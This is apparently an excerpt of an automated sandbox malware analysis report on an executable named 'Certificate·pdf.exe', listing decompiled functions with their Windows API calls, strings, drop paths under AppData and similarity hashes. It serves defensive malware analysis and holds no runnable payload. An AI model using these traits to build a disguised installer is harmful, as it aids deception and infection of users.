Instruction Fuzzy Hash: 7D41D830900918A6CF21AB65CC89ABF7678EF82718F14827FF801B11C1D77C5985DE6E

Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183

Strings

C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens, xrefs: 004021C3

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens
API String ID: 542301482-2063836133
Opcode ID: 47d0b6cfbb01b3f03f9c85bf81605092c369e934b5dec228f075aa53eaa66100
Instruction ID: 8dfa29a236a07f1275cc6a79af1154fb3a8ffb17113c9066b1df84c51f017d98
Opcode Fuzzy Hash: 47d0b6cfbb01b3f03f9c85bf81605092c369e934b5dec228f075aa53eaa66100
Instruction Fuzzy Hash: 4F413A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54

Function 004043CD Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040446B
GetDlgItem.USER32(?,000003E8), ref: 0040447F
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040449C
GetSysColor.USER32(?), ref: 004044AD
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044BB
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044C9
lstrlenW.KERNEL32(?), ref: 004044CE
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044DB
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044F0
GetDlgItem.USER32(?,0000040A), ref: 00404549
SendMessageW.USER32(00000000), ref: 00404550
GetDlgItem.USER32(?,000003E8), ref: 0040457B
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045BE
LoadCursorW.USER32(00000000,00007F02), ref: 004045CC
SetCursor.USER32(00000000), ref: 004045CF
LoadCursorW.USER32(00000000,00007F00), ref: 004045E8
SetCursor.USER32(00000000), ref: 004045EB
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040461A
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040462C

Strings

N, xrefs: 00404569
Execute: , xrefs: 004045AA
DC@, xrefs: 004045D7

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: DC@$Execute: $N
API String ID: 3103080414-3191944959
Opcode ID: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
Instruction ID: 7c305bb631aa8564409a9791ba7e53f932479190766108f73685c8e55a50eb1d
Opcode Fuzzy Hash: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
Instruction Fuzzy Hash: 3B61A0B1900209BFDF10AF60DD45AAA7B69FB85344F00843AF701B61E0D77DA951CF98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,007A7A20,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
Instruction ID: 0958fbfe94b1809001ec2c76305b3cf500f7264b01c73c256976ee1787a3906e
Opcode Fuzzy Hash: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
Instruction Fuzzy Hash: B1418C71800209AFCF058F95DE459AF7BB9FF45310F00842AF591AA1A0CB38D954DFA4

Function 00405EE3 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040607E,?,?), ref: 00405F1E
GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405F27

Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34

GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F44
wsprintfA.USER32 ref: 00405F62
GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?,?,?,?,?), ref: 00405F9D
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FAC
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE4
SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040603A
GlobalFree.KERNEL32(00000000), ref: 0040604B
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406052

Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(007B6800,00402F1D,007B6800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3

Strings

[Rename], xrefs: 00405FCC, 00405FDE
%ls=%ls, xrefs: 00405F58

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
Instruction ID: 42876e8bd8e74e9ce15c52ab3024c97c29192655820983ae090f8c600f4dcad6
Opcode Fuzzy Hash: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
Instruction Fuzzy Hash: 25312530240B156BD220BB218D48F6B3A9DEF86744F15003AFA42F62D1EA7DD8148ABD

Function 0040652B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Certificate#U00b7pdf.exe",00403347,C:\Users\user\AppData\Local\Temp\,77143420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Certificate#U00b7pdf.exe",00403347,C:\Users\user\AppData\Local\Temp\,77143420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Certificate#U00b7pdf.exe",00403347,C:\Users\user\AppData\Local\Temp\,77143420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040652C, 00406531
"C:\Users\user\Desktop\Certificate#U00b7pdf.exe", xrefs: 0040652B
*?|<>/":, xrefs: 0040657D

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Certificate#U00b7pdf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2120515890
Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
Instruction ID: 354a4add7e9ac5ce680480da4fd3ed99b8030fd96c8c1ffbe99f836226306b46
Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
Instruction Fuzzy Hash: 4511B655800612A5DF303B14AD44A7772F8EF547A0F56443FE985733C4E77C5C9286AD

Function 00404275 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404292
GetSysColor.USER32(00000000), ref: 004042D0
SetTextColor.GDI32(?,00000000), ref: 004042DC
SetBkMode.GDI32(?,?), ref: 004042E8
GetSysColor.USER32(?), ref: 004042FB
SetBkColor.GDI32(?,?), ref: 0040430B
DeleteObject.GDI32(?), ref: 00404325
CreateBrushIndirect.GDI32(?), ref: 0040432F

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction ID: 595a5ac3551c8926a474018cd00e052a0643935c19338169816fcf7950983a94
Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction Fuzzy Hash: BD2135716007049FCB219F68DD48B5BBBF8AF81715B048A3EED96A26E0D734E944CB54

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A

Part of subcall function 00405E6E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,?,?,0040262F,00000000,00000000,?,00000000,00000011), ref: 00405E84

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6

Strings

9, xrefs: 00402699

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
Instruction ID: 60624729709df044e3b9a276a2138f1bd207bb457e97f94edfd4483e5cf9eee0
Opcode Fuzzy Hash: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
Instruction Fuzzy Hash: 61510974D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D0DBB89982CB58

Function 00404BC9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BE4
GetMessagePos.USER32 ref: 00404BEC
ScreenToClient.USER32(?,?), ref: 00404C06
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C18
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C3E

Strings

f, xrefs: 00404C1A

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: e2d68be7770c43893e1e2478522bb0d44a2fa382b0b36792216c84cf33d7cb12
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: 6F015E71D00218BAEB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A018BA4

Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
MulDiv.KERNEL32(00024200,00000064,00065328), ref: 00402E3C
wsprintfW.USER32 ref: 00402E4C
SetWindowTextW.USER32(?,?), ref: 00402E5C
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E

Strings

verifying installer: %d%%, xrefs: 00402E46

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
Instruction ID: 3b7df5e00b9d055b55134e233a6447c2e1405f162d6c23549fa63679cea1b34f
Opcode Fuzzy Hash: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
Instruction Fuzzy Hash: 5601677164020CBFDF109F50DD49FAE3B69AB04305F108439FA05B51E0DBB98555CF58

Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
GlobalFree.KERNEL32(?), ref: 00402956
GlobalFree.KERNEL32(00000000), ref: 00402969
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
